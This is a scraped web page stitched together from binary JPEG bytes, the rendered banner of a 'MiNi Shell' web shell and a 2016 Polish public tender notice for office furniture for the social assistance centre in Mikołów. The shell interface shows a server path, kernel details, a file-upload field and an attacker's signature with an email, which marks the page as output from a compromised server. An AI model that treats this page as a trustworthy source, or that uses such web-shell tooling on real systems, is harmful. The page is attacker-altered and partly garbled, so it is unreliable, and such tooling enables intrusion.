JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160304/48774-N-2016.html

<p class="kh_header"><b>Mikołów: Zakup i sukcesywna dostawa mebli biurowych dla MOPS w Mikołowie w tym dla potrzeb projektu Krok w przyszłość w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020, Oś Priorytetowa IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - projekt pozakonkursowy.</b><br>
<b>Numer ogłoszenia: 48774 - 2016; data zamieszczenia: 04.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 2, 43-190 Mikołów, woj. śląskie, tel. 32 3242666, faks 32 3242694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.mikolow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i sukcesywna dostawa mebli biurowych dla MOPS w Mikołowie w tym dla potrzeb projektu Krok w przyszłość w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020, Oś Priorytetowa IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - projekt pozakonkursowy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i sukcesywna dostawa mebli biurowych dla MOPS w Mikołowie w tym dla potrzeb projektu Krok w przyszłość w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020, Oś Priorytetowa IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - projekt pozakonkursowy.
OPIS PRZEDMIOTU ZAMÓWIENIA- wymagania minimalne

Opis techniczny zamawianych mebli i wymagania Zamawiającego:
1.	Dwa pokoje winny zostać wyposażone całościowo 
2.	część asortymentu mebli stanowi uzupełnienie istniejących mebli biurowych stanowiących wyposażenie pomieszczeń biurowych co wiąże się z dopasowaniem koloru i kształtu do istniejących mebli  
Uwaga
Wszystkie zdjęcia stanowią materiał poglądowy 
1.1	Pokój nr 1
Pokój przeznaczony dla 4 pracowników biurowych. W pokoju winny być meble z punktów 2.1 w ilości 4 sztuki; 2.2 w ilości 4 sztuki; 2.3 w ilości 4 sztuk; 2.4 w ilości 4 sztuki; 2.7 w ilości 1 sztuka; 2.8 w ilości 2 sztuk; 2.10 w ilości 2 sztuki; 2.12 w ilości 2 sztuk; 2.16 w ilości 1 sztuka
1.2 Pokój nr 2
W pokoju winny być meble z punktów: 2.13 w ilości 1 sztuka; 2.14 w ilości 1 sztuka; 2.15 w ilości 2 sztuk; 2.16 w ilości 1 sztuka; 2.17 w ilości 1 sztuka; 2.18 w ilości 1 sztuka; 2.19 w ilości 1 sztuka
2.1
Biurko
- wymiary zewnętrzne wysokość min 750mm, głębokość min 700mm, szerokość min 1200mm - dopuszczalne różnice w rozmiarach +/- 3 cm
- grubość płyty min gr 25 mm - wypełniana
- otwory pod przelotki w blacie wykonywane w trakcie montażu w miejscu wskazanym przez zamawiającego
- pusta przestrzeń na nogi 
- listwa montażowa do kabli 
- biurko powinno posiadać blendę łączącą nogi biurka
- półka na klawiaturę o wymiarach szer. 65 cm/ gł. 40 cm/ wys 10 cm wykonana z płyty 18 mm, zamontowana na dwóch metalowych lakierowanych prowadnicach rolkowych z pełnym wysuwem zabezpieczona przed wypadnięciem, pomiędzy krawędzią biurka, a krawędzią półki na klawiaturę- min 10 cm wolnej przestrzeni na swobodne oparcie dłoni
- nóżki służące do regulacje poziomu
- kolor olcha
- śruby osłonięte zaślepkami
 - płyta wiórowa melaminowana
- klasa higieny E1
- wąskie płaszczyzny zabezpieczone okleiną PCV	
 
2.2 
Nadstawka do biurko
- wymiary min. wysokość 400mm, głębokość min 300mm, szerokość min 1200mm
- grubość płyty min. 18 mm
- w kolorze biurka z pkt.2.1
- śruby osłonięte zaślepkami
- płyta wiórowa melaminowana
- klasa higieny E1
- wąskie płaszczyzny zabezpieczone okleiną PCV
 
2.3
Kontener na dokumenty pod biurko z pkt 2,1
 - wymiary wysokość max 600mm, głębokość min 500mm, szerokość min 400mm
- ilość szuflad 3 zamykane na klucz
- płyta wiórowa melaminowana
- grubość płyty min. 18 mm
- klasa higieny E1
- wąskie płaszczyzny zabezpieczone okleiną PCV
- wyposażony w zestaw gumowanych kółek jezdnych przeznaczonych do miękkich powierzchni
- uchwyty szuflad dwupunktowe o rozstawie 125-128 mm, metalowe w kolorze srebro satynowe
- spodu szuflad z płyty pilśniowej twardej o gr min 6 mm jednostronnie lakierowanej
- szuflady na prowadnicach rolkowych metalowych lakierowanych z pełnym wysuwem zabezpieczone przed wypadnięciem
- kolor olcha
 

2.4 
Krzesło obrotowe 
- samohamowne kółka jezdne
- amortyzator gazowy umożliwiający płynną regulację wysokości siedziska w zakresie 47- 57,5 cm
- nowoczesny mechanizm SYNCHRO umożliwiający synchroniczne odchylanie oparcia i siedziska z regulacją twardości sprężyny za pomocą wygodnego pokrętła znajdującego się po prawej stronie siedziska, umożliwiającego regulację mechanizmu w pozycji siedzącej, odchylonej do tyłu 
- siedzisko krzesła wykonane ze sklejki drewna liściastego, wyściełane integralną pianką PU, o gęstości 80 kg/m3 (wykonaną w technologii pianek wylewanych w formach gwarantującej wysoką odporność na zgniatanie oraz maksymalny komfort siedzenia); 
- siedzisko wyposażone w mechanizm regulacji głębokości w zakresie 50mm 
- siedzisko tapicerowane tkaniną z atestem trudnopalności, 100% poliester, o klasie ścieralności na poziomie 150 000 cykli (PN-EN ISO 12947-2), odporności na piling 5 (EN ISO 12945-2);
- oparcie krzesła, wykonane w technologii wtrysku o lekkiej konstrukcji z materiału stanowiącego mieszankę PP oraz FG (polipropylenu z włóknem szklanym). Na konstrukcję oparcia naciągnięta jest siatka o składzie 100% poliester, gramaturze - 453 g/m2, odporności na piling- 4,5, odporności na ścieranie ponad 100000 cykli Martindale oraz trudno zapalności BS 5852 crib
- siatka oparcia rozciągnięta jest wyłącznie między pionowymi bokami konstrukcji oparcia, bez poprzeczek na górze jak i na dole oparcia. Oparcie wyraźnie wyprofilowane do naturalnego kształtu kręgosłupa w części podtrzymującej odcinek lędźwiowo - krzyżowy
- oparcie posiada siedmiostopniową regulację wysokości;
- regulowane podłokietniki, z nakładką wykonaną z miękkiego poliuretanu, w kolorze czarnym;
Gabaryty zewnętrzne: +/- 1 cm
wysokość całkowita: 99,5-117 cm 
wysokość siedziska : 47-57,5 cm
szerokość siedziska : 47 cm
głębokość siedziska 36,5-42 cm
szerokość podstawy: 64 cm
głębokość całkowita : 64 cm
wysokość podłokietników: 64-72 cm (w dolnym skrajnym położeniu siedziska)
- krzesło spełnia normę określającą obrotowe krzesła biurowe PN EN 1535-1;
- krzesło posiada certyfikat zgodności z Rozporządzeniem Ministra Pracy i Polityki Socjalnej w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe
- kolor krzesła czarny
  
2.5

Krzesło konferencyjne
- rama stalowa chromowana
- siedzisko i oparcie z polipropylenu
- wymiary min 800 mm wysokości, min 480 mm szerokość, min 470 mm głębokość
- kolor ciemnoszary
-nogi zakończone stopkami zabezpieczającymi przed rysowaniem podłogi

2.6

Stolik 
- wymiary min 750 mm wysokości, min 800 mm szerokość, głębokość min 700 mm - dopuszczalne różnice w rozmiarach +/- 3 cm
- nogi okrągłe, metalowe , chromowane 
- płyta wiórowa melaminowana, grubość płyty min 25 mm
- obrzeża wykonano z okleiny PVC w kolorze blatu
- kolor olcha
 
2.7
Szafka gospodarcza z blatem
- wymiary min 1100 mm wysokość, min 800 mm szerokość, min 350 mm głębokość - dopuszczalne różnice w rozmiarach +/- 2
- 2 skrzydła drzwiowe 
- płyta wiórowa melaminowana, grubość płyty min 18 mm ,odporna na zalania
- obrzeża wykonano z okleiny PVC w kolorze szafki
- kolor olcha
-1 półka wewnątrz szafki
- szafka powinna posiadać 4 nóżki regulowane
- uchwyty szafki dwupunktowe o rozstawie 125-128 mm metalowe w kolorze srebro satynowe
 
2.8 
Szafa biurowa metalowa dwudrzwiowa
-wymiary min  1990 mm wysokości, min 1000 mm szerokości, min 435 mm głębokości
- grubość blachy min 0,8 mm 
- ilość półek 4 (z możliwością regulowania)
- zamykana na zamek
- kolor szary
 


2.9
Szafa biurowa metalowa dwudrzwiowa
-wymiary min1990 mm wysokości, min 800 mm szerokości, min 435 mm głębokości
- grubość blachy min 0,8 mm 
- ilość półek. 4 (z możliwością regulowania rozmieszczenia)
- zamykana na zamek
- kolor szary
- zdjęcie poglądowe tak jak w pkt. 2.8

2.10
Nadstawka biurowa metalowa  dwudrzwiowa
-wymiary min 1040 mm wysokości, min 1000 mm szerokości, 435 mm głębokości
- grubość blachy. Min 0,8 mm 
- ilość półek. 1 (z możliwością regulowania jej umieszczenia)
- zamykana na zamek
- kolor szary
 
2.11
Nadstawka biurowa metalowa dwudrzwiowa
-wymiary min 1040 mm wysokości, min 800 mm szerokości, min 435 mm głębokości
- grubość blachy min 0,8 mm 
- ilość półek 2 ( z możliwością regulowania ich rozmieszczenia)
- zamykana na zamek
- kolor szary
- zdjęcie poglądowe tak jak w pkt. 2.10

2.12
Krzesło dziecięce
- wymiary wysokość min 670 mm, min 390mm szerokość, min 280mm głębokość
 - siedzisko i oparcie z polipropylenu 
- kolor niebieski i zielony
 
2.13
Regał meblowy 
- wymiary min 1850 mm wysokość, min 800 mm szerokość, min 360 mm głębokość - dopuszczalne różnice w rozmiarach +/- 2, podzielony na 2 części: dolna zamyka szafka dwudrzwiowa, z jedna półką w środku. Część górna  otwarta - z dwoma półkami, regulacja wysokości półek
- plecy pełne z płyty melaminowanej gr 18 mm w kolorze białym
- kolor regału biały, fronty drzwiczek w kolorze zielonym 
- śruby osłonięte zaślepkami
 - płyta wiórowa melaminowana
- klasa higieny E1
- wąskie płaszczyzny zabezpieczone okleiną PCV
- regał winien posiadać 	możliwość montażu do ściany
- skrzydła drzwiczek regału powinny posiadać zawiasy metalowe puszkowe z samodomykiem pozwalające na otwieranie ich w zakresie 110°
- regał powinien posiadać 4 nóżki regulowane
- uchwyty drzwiczek regału, jednopunktowe w kolorze białym
 
2.14
Stolik dziecięcy 
- wymiary min 59 cm x 59 cm x 48 cm wysokości
- kolor blatu czerwony
- płyta wiórowa melaminowana - grubość min 25 mm
- klasa higieny E1
- wąskie płaszczyzny zabezpieczone okleiną PCV
- nogi metalowe, chromowane, okrągłe
- wszystkie krawędzie zaokrąglone
 
2.15
Krzesło dziecięce 
- wymiary min 40 cm x 43 cm x 50 cm wysokości, wykonane ze sklejki profilowanej na gorąco
- kompletowane ze stolikiem z pkt 2.14
-kolor siedziska i oparcia zielony 
- wszystkie krawędzie zaokrąglone
 
2.16
Regał plastikowy z szufladami (pojemniki na zabawki)
- wymiary: szerokość min 38,5 cm, długość min 40.5 cm, wysokość min 99,5 cm, - pojemność pojemników nie mniej niż 18l
- różnokolorowe
 
2.17
Wykładzina dywanowa dziecięca 
- wymiary: min 470 cm x min 239 cm
- materiał 100% P-P
- wysokość runa: ok 5 mm
- podkład: filc, obszyte krawędzie
- kolor i wzór do uzgodnienia z wykonawcą

2.18
Sofa biurowa
- wymiary:  szerokość min 160 cm, wysokość min 75 cm, głębokość min 67 cm 
- materiał Eko-skóra
- kolor jasno szary
 
2.19
Fotel biurowy stacjonarny pasujący do sofy z pkt. 18
- wymiary: szerokość min 75 cm, wysokość min 75 cm, głębokość min 67 cm
- materiał Eko-skóra - kompletowany z sofą z pkt 2.18
- miękkie siedzisko i oparcie
- siedzisko i oparcie zintegrowane z podłokietnikami
- kolor jasno szary
 
2.20
Stolik 
- wymiary min 700mm wysokości, min 1000mm długość, szerokość min  600 mm - dopuszczalne różnice w rozmiarach +/- 3 cm
- nogi okrągłe, metalowe chromowane, 
- płyta wiórowa melaminowana, grubość płyty min 25 mm
- obrzeża wykonano z okleiny PVC w kolorze blatu
- kolor ciemnoszary
 
2.21
Ławka dla 5 osób
- siedzisko i oparcie z polipropylenu
- wymiary pojedynczego siedziska min 800 mm wysokości, min 480 mm szerokość, min 470 mm głębokość
- rama metalowa, malowana proszkowa na kolor czarny
- kolor siedziska - ciemno szary
 
2.22
Ławka dla 4 osób
- siedzisko i oparcie z polipropylenu
- wymiary pojedynczego siedziska min 800 mm wysokości, min 480 mm szerokość, min 470 mm głębokość
- rama metalowa, malowana proszkowa na kolor czarny
- kolor siedziska - ciemno szary
- zdjęcie poglądowe tak jak w pkt. 2.21

2.23
Szafka pod drukarkę
- wymiary wysokość max 600mm, głębokość min 500mm, szerokość min 400mm
- płyta wiórowa melaminowana
- grubość płyty min. 18 mm
- klasa higieny E1
- wąskie płaszczyzny zabezpieczone okleiną PCV
- wyposażony w zestaw gumowanych kółek jezdnych przeznaczonych do miękkich powierzchni
- uchwyt drzwiczek dwupunktowy o rozstawie 125-128 mm, metalowy w kolorze srebro satynowe
- kolor olcha
- bez zamka 
 
2.24
Regał na książki
- wymiary min 1700 mm wysokość, min 600 mm szerokość, min 360 mm głębokość - dopuszczalne różnice w rozmiarach +/- 2
- plecy pełne z płyty melaminowanej gr 18 mm w kolorze białym
- kolor regału biały, fronty drzwiczek w kolorze zielonym 
- śruby osłonięte zaślepkami
 - płyta wiórowa melaminowana
- klasa higieny E1
- wąskie płaszczyzny zabezpieczone okleiną PCV
- regał winien posiadać 	możliwość montażu do ściany
- regał powinien posiadać 4 nóżki regulowane
- ilość półek 4 z możliwością regulacji
- kolor olcha

 
2.25	
Krzesło 
- obrotowe siedzisko, pokryte eko-skórą w kolorze czarnym 
- pneumatyczną regulację wysokości
-   podnóżek
- antypoślizgową podstawę
- wymiary min.:
-wysokość do oparcia: 96 - 117 cm
- wysokość do siedziska: 65 - 86 cm
- szerokość: 41 cm
- głębokość: 47 cm
- głębokość siedziska: 35 cm
- średnica podstawy 41 cm
- podstawa z nogą krzesła metalowe, chromowane
 

Opis techniczny oraz zdjęcia lub rysunki mebli objętych przedmiotem zamówienia Wykonawca winien dołączyć do oferty.
Zastosowane do produkcji mebli materiały muszą być zgodne z odpowiednimi normami jakości oraz posiadać wymagane stosownymi przepisami atesty..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji dostawy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.mikolow.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2016 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Krok w przyszłość w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020, Oś Priorytetowa IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - projekt pozakonkursowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com